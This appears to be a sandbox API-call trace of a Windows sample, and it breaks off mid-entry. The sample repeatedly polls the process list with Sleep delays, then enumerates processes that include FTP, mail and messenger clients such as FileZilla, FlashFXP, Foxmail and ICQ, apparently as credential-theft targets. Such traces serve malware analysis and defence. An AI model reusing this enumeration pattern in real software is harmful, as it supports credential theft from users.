[0189.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0189.970] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.042] Sleep (dwMilliseconds=0x64) [0190.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.073] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.154] Sleep (dwMilliseconds=0x64) [0190.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.182] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.256] Sleep (dwMilliseconds=0x64) [0190.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.274] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.349] Sleep (dwMilliseconds=0x64) [0190.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.367] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.441] Sleep (dwMilliseconds=0x64) [0190.451] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.464] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.594] Sleep (dwMilliseconds=0x64) [0190.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.631] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.769] Sleep (dwMilliseconds=0x64) [0190.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.789] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.870] Sleep (dwMilliseconds=0x64) [0190.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.887] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.962] Sleep (dwMilliseconds=0x64) [0190.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0190.977] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.050] Sleep (dwMilliseconds=0x64) [0191.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0191.073] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.165] Sleep (dwMilliseconds=0x64) [0191.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0191.180] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.253] Sleep (dwMilliseconds=0x64) [0191.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0191.281] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.283] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.285] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.287] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.290] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.292] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.301] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.303] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.306] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.308] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.315] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.316] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.318] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.320] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.322] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.324] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.329] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.331] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.332] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.334] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.335] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.337] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.338] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.344] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.346] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.349] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.351] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.353] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.355] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0191.361] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.363] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.365] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.367] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0191.369] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0191.370] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0191.374] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0191.376] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0191.377] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0191.379] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0191.382] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0191.383] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0191.385] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0191.392] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0191.394] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0191.395] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0191.397] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0191.398] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0191.400] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0191.401] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0191.407] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0191.408] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0191.410] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0191.411] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0191.412] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0191.414] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0191.415] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0191.417] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0191.419] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0191.423] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0191.425] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0191.427] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0191.429] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0191.430] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0191.432] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0191.437] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0191.439] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0191.441] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 